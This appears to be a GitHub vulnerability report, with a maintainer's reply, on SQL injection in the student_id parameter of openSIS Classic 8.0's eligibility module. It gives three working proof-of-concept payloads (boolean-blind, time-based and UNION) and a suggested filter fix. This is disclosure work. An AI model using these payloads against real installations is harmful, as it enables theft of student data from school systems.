Due to lack of protection, parameter student_id in /modules/eligibility/Student.php can be abused to injection SQL queries to extract information from databases.
POC:
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: /openSIS-Classic-8.0/Ajax.php?modname=eligibility/Student.php&student_id=(SELECT (CASE WHEN (5146=5146) THEN 15 ELSE (SELECT 5608 UNION SELECT 5507) END))&ajax=true
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: /openSIS-Classic-8.0/Ajax.php?modname=eligibility/Student.php&student_id=15 AND 2719=BENCHMARK(5000000,MD5(0x5246526f))&ajax=true
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: /openSIS-Classic-8.0/Ajax.php?modname=eligibility/Student.php&student_id=15 UNION ALL SELECT NULL,NULL,CONCAT(0x716b706271,0x6b67466d72447a6e53786a6d4c527a71657250527871584356544f484c4a417a494c48637847576d,0x7170786b71),NULL,NULL-- -&ajax=true
Traceback:
openSIS-Classic-8.0/modules/eligibility/Student.php Solution:
Use function sqlSecurityFilter() before assign $_REQUEST['student_id'] into query "SELECT".
The text was updated successfully, but these errors were encountered:
We appreciate your observation and would like to inform that your suggestion has been implemented. Please check and let us know your feedback in case you have any.
Due to lack of protection, parameter
student_idin /modules/eligibility/Student.php can be abused to injection SQL queries to extract information from databases.POC:
Traceback:
openSIS-Classic-8.0/modules/eligibility/Student.php
Solution:
Use function sqlSecurityFilter() before assign $_REQUEST['student_id'] into query "SELECT".
The text was updated successfully, but these errors were encountered: